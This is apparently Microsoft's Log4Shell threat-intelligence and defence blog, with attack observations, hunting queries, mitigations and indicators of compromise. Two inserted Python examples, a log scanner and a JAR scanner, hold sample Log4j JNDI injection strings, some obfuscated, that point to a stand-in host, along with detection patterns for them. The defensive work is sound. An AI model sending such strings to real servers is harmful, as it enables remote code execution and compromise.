_**January 10, 2022 recap** - The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers’ software and services. Because Log4j is a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to use scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._
_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware. We have observed many existing attackers adding exploits of these vulnerabilities to their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends that customers do an additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software products and services that are impacted, and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._
_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._
The remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as “Log4Shell” ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) have presented a new attack vector and gained broad attention due to their severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mass scanning, coin mining, establishing remote shells, and red-team activity, but it’s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.
With nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.
Meanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.
This blog covers the following topics:
1. **Attack vectors and observed activity**
2. **Finding and remediating vulnerable apps and systems**
* Threat and vulnerability management
* Discovering affected components, software, and devices via a unified Log4j dashboard
* Applying mitigation directly in the Microsoft 365 Defender portal
* Microsoft 365 Defender advanced hunting
* Microsoft Defender for Cloud
* Microsoft Defender for servers
* Microsoft Defender for Containers
* Microsoft Sentinel queries
* RiskIQ EASM and Threat Intelligence
3. **Detecting and responding to exploitation attempts and other related attacker activity**
* Microsoft 365 Defender
* Microsoft Defender Antivirus
* Microsoft Defender for Endpoint
* Microsoft Defender for Cloud Apps
* Microsoft Defender for Office 365
* Microsoft 365 Defender advanced hunting
* Microsoft Defender for Cloud
* Microsoft Defender for IoT
* Microsoft Sentinel
* Microsoft Sentinel queries
* Azure Firewall Premium
* Azure Web Application Firewall (WAF)
4. **Indicators of compromise (IoCs)**
## Attack vectors and observed activity
Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, has been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as “Log4Shell”.
The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:

An attacker performs an HTTP request against a target system, which logs the request using Log4j 2; the crafted string in the request causes Log4j 2 to use JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site in order to fingerprint vulnerable systems.
The specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains “jndi”, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as “ldap”, “ldaps”, “rmi”, “dns”, “iiop”, or “http”, precedes the attacker domain.
As security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We’ve seen things like running a lower or upper command within the exploitation string, and even more complicated obfuscation attempts such as the following, all of which try to bypass string-matching detections:

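The following is an added example, not code from the original post, of the detection problem just described: it resolves Log4j lookup syntax (`${lower:…}`, `${upper:…}` and the `${key:-default}` form) in a request log line before matching, so the obfuscated variants collapse to the plain `jndi:<protocol>` form the page lists. The log lines, the `example.invalid` host and the single URL-decode step are constructed assumptions about how such strings appear in web request logs.

```python
"""Added example: normalize Log4j 2 lookup syntax in web request log lines so that
case-rewriting and default-value obfuscations collapse to a plain jndi:<protocol>
form before string matching. Sample log lines below are constructed."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Protocols this page lists as following "jndi:" in the crafted string.
_JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|http)", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Resolve one lookup body offline, mirroring how Log4j's substitutor treats it."""
    for prefix, fn in (("lower:", str.lower), ("upper:", str.upper)):
        if body.startswith(prefix):
            # "lower:X:-dflt" resolves lower:X first, so the default is never used
            return fn(body[len(prefix):].split(":-", 1)[0])
    if ":-" in body:
        # "key:-default": an unresolvable key (e.g. "${::-j}") yields the default
        return body.split(":-", 1)[1]
    # env/sys/date/... cannot be resolved offline; keep the text so the loop terminates
    return body


def normalize_lookups(text: str, max_rounds: int = 64) -> str:
    """Repeatedly resolve innermost ${...} expressions until none remain."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI protocol (lowercase) found in a log line, or None."""
    # Assumption: request logs may carry the string URL-encoded; decode once first.
    normalized = normalize_lookups(unquote(line))
    match = _JNDI.search(normalized)
    return match.group(1).lower() if match else None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """(1-based line number, protocol) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        protocol = find_jndi(line)
        if protocol:
            hits.append((number, protocol))
    return hits


# Constructed sample log lines (example.invalid is a reserved, non-routable name).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:L}${upper:d}ap://example.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://example.invalid/x}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%7D HTTP/1.1" 404 "-"',
]

if __name__ == "__main__":
    for number, protocol in scan_log(SAMPLE_LOG):
        print(f"line {number}: jndi:{protocol} lookup after normalization")
```

Matching on the normalized text rather than the raw line is what makes the `lower`/`upper` and `:-` rewrites ineffective against this check; lookups that need runtime context (env, sys, date) are left as text, so a pattern hidden behind them still needs a second signal such as the outbound DNS or LDAP request itself.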
The vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can pursue any number of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.
### Exploitation continues on non-Microsoft hosted Minecraft servers
Minecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.
Microsoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via a third-party Minecraft mod loader.
In these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.
While it’s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.
Due to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.
### Nation-state activity
MSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development and integration of the vulnerabilities into in-the-wild payload deployment, to exploitation against targets to achieve the actor’s objectives.
For example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.
In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.
### Access brokers associated with ransomware
MSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.
### Mass scanning activity continues
The vast majority of traffic observed by Microsoft remains mass scanning by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the jndi:ldap:// request to launch bash commands on Linux and PowerShell on Windows.
Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.
### Additional RAT payloads
We’ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we’ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.
This activity is split between small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44228 to existing campaigns that were already exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.
### Webtoos
The Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. The attackers’ intent in using this malware is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems since before this vulnerability.
### A note on testing services and assumed benign activity
While services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.
### Exploitation in internet-facing systems leads to ransomware
As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.
These attacks are performed by a China-based ransomware operator that we’re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).
Based on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.
### Attackers propagating Log4j attacks via previously undisclosed vulnerability
During our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitization.
We reported our discovery to SolarWinds, and we’d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend that affected customers apply the security updates SolarWinds has released; refer to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>.
Microsoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.
## Finding and remediating vulnerable apps and systems
### Threat and vulnerability management
[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization’s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.
#### Discovering affected components, software, and devices via a unified Log4j dashboard
Threat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.
The wide use of Log4j across many suppliers’ products challenges defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities, on the device, software, and vulnerable component level, through a range of automated, complementary capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:
* Discovery of vulnerable Log4j library components (paths) on devices
* Discovery of vulnerable installed applications that contain the Log4j library on devices
* A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files
* Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:
```kusto
DeviceTvmSoftwareEvidenceBeta
| mv-expand DiskPaths
| where DiskPaths contains "log4j"
| project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths
```
To complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:
```kusto
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2021-44228", "CVE-2021-45046")
```
These new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.

_Figure 1. Threat and Vulnerability recommendation “Attention required: Devices found with vulnerable Apache Log4j versions”_
On the Microsoft 365 Defender portal, go to **Vulnerability management** > **Dashboard** > **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.

_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_

_Figure 3. Threat and vulnerability management finds exposed paths_

_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_
Note: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.
Through [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.

_Figure 5. Finding vulnerable applications and devices via software inventory_
#### Applying mitigation directly in the Microsoft 365 Defender portal
We have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:
1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.
To use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.

_Figure 6. Viewing each device’s mitigation status_
2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.
The mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):

You can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.

_Figure 7. Creating mitigation actions for exposed devices._
In cases where the mitigation needs to be reverted, follow these steps:
1. Open an elevated PowerShell window
2. Run the following command:
```powershell
[Environment]::SetEnvironmentVariable("LOG4J_FORMAT_MSG_NO_LOOKUPS", $null, [EnvironmentVariableTarget]::Machine)
```
The change will take effect after the device restarts.
### Microsoft 365 Defender advanced hunting
Advanced hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.
```kusto
DeviceTvmSoftwareInventory
| where SoftwareName contains "log4j"
| project DeviceName, SoftwareName, SoftwareVersion
```

_Figure 8. Finding vulnerable software via advanced hunting_
### Microsoft Defender for Cloud
#### Microsoft Defender for servers
Organizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there’s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:
* Vulnerability assessment findings – Organizations that have enabled any of the vulnerability assessment tools (whether it's Microsoft Defender for Endpoint's [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)) can search by CVE identifier:

_Figure 9. Searching vulnerability assessment findings by CVE identifier_
* Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:

_Figure 10. Searching software inventory by installed applications_
Note that this doesn’t replace a search of your codebase. It’s possible that software with integrated Log4j libraries won’t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).
#### Microsoft Defender for Containers
Microsoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>).
Log4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting).
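The scanner below is an added example, not Microsoft's discovery logic or code from this post, of the file-level discovery described here and in the threat and vulnerability management section above: it walks a directory, opens each JAR/WAR, looks for the JndiLookup class, reads the version from the Maven pom.properties when present, and recurses into nested archives, going beyond one level of nesting and also flagging relocated (shaded) copies whose version it cannot read. The archive contents, the version string 2.14.1 and the path names are constructed sample data.

```python
"""Added example: find Log4j 2 core (JndiLookup) inside JARs, including JARs
nested inside other JARs/WARs and relocated ("shaded") copies."""
import io
import os
import tempfile
import zipfile
from typing import List, Tuple

# The class implementing the JNDI lookup; its presence marks a log4j-core copy.
JNDI_CLASS_SUFFIX = "log4j/core/lookup/JndiLookup.class"
# Maven metadata that carries the artifact version when the JAR is not shaded.
POM_PROPS_SUFFIX = "/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")

Finding = Tuple[str, str]  # (archive path, version or "unknown")


def _version_from_props(data: bytes) -> str:
    for line in data.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return "unknown"


def inspect_jar(blob: bytes, name: str, depth: int = 0, max_depth: int = 3) -> List[Finding]:
    """Report every log4j-core found in this archive or in archives nested inside it."""
    findings: List[Finding] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return findings  # not a ZIP container: nothing to inspect
    with zf:
        members = zf.namelist()
        # endswith() rather than equality so relocated (shaded) class paths still match
        if any(m.endswith(JNDI_CLASS_SUFFIX) for m in members):
            props = [m for m in members if m.endswith(POM_PROPS_SUFFIX)]
            version = _version_from_props(zf.read(props[0])) if props else "unknown"
            findings.append((name, version))
        if depth < max_depth:
            for m in members:
                if m.lower().endswith(ARCHIVE_EXTS):
                    findings.extend(inspect_jar(zf.read(m), f"{name}!/{m}", depth + 1, max_depth))
    return findings


def scan_directory(root: str) -> List[Finding]:
    """Walk a directory tree and inspect every archive found."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(inspect_jar(fh.read(), path))
    return findings


def build_sample_jar(version: str = "2.14.1", shaded: bool = False) -> bytes:
    """Constructed stand-in for a log4j-core JAR: real layout, dummy class bytes."""
    prefix = "shaded/" if shaded else ""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(prefix + "org/apache/logging/" + JNDI_CLASS_SUFFIX, b"\xca\xfe\xba\xbe")
        if not shaded:  # shading tools typically drop the original Maven metadata
            zf.writestr("META-INF/maven/org.apache.logging.log4j" + POM_PROPS_SUFFIX,
                        f"version={version}\nartifactId=log4j-core\n")
    return buf.getvalue()


def build_sample_uberjar() -> bytes:
    """Constructed application JAR bundling the sample log4j-core one level deep."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", build_sample_jar("2.14.1"))
    return buf.getvalue()


def demo() -> List[Finding]:
    """Write the constructed uber-JAR to a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "app.jar"), "wb") as fh:
            fh.write(build_sample_uberjar())
        return scan_directory(tmp)


if __name__ == "__main__":
    for path, version in demo():
        print(f"log4j-core {version}: {path}")
```

A finding reported as "unknown" still contains the lookup class and should be treated as exposed until its version is confirmed from the application vendor; compare reported versions against the Apache advisory rather than hard-coding a cutoff.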
We will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.
**Finding affected images**
To find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs.

_Figure 11. Finding images with the CVE-2021-45046 vulnerability_
**Find vulnerable running images on Azure portal [preview]**
To view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs:

_Figure 12. Finding running images with the CVE-2021-45046 vulnerability_
Note: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.
**Search Azure Resource Graph data**
Azure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.
The following query finds resources affected by the Log4j vulnerability across subscriptions. Use the additional data field across all returned results to obtain details on vulnerable resources:
```kusto
securityresources
| where type =~ "microsoft.security/assessments/subassessments"
| extend assessmentKey=extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract("(.+)/providers/Microsoft.Security", 1, id)
| extend Props = parse_json(properties)
| extend additionalData = Props.additionalData
| extend cves = additionalData.cve
| where isnotempty(cves) and array_length(cves) > 0
| mv-expand cves
| where tostring(cves) has "CVE-2021-44228" or tostring(cves) has "CVE-2021-45046" or tostring(cves) has "CVE-2021-45105"
```
### Microsoft Sentinel queries
Microsoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:
* [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)
This query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.
Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>
### RiskIQ EASM and Threat Intelligence
RiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one, with links to previous articles, can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it's possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Use this method of exploration to understand the larger Internet exposure, while also filtering down to what may impact you.
For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note that you must be registered with a corporate email, and the automated attack surface view will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab.
## Detecting and responding to exploitation attempts and other related attacker activity
### Microsoft 365 Defender
Microsoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.

_Figure 13. Microsoft 365 Defender solutions protect against related threats_
Customers can click **Need help?** in the Microsoft 365 Defender portal to open a search widget. Customers can key in “Log4j” to search for in-portal resources, check whether their network is affected, and work on the corresponding actionable items to mitigate the issue.
#### Microsoft Defender Antivirus
Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:
On Windows:
* [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>) - detects attempted exploitation on the attacker machine
* [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine
* [VirTool:Win64/CobaltStrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders
* [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner
* [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell
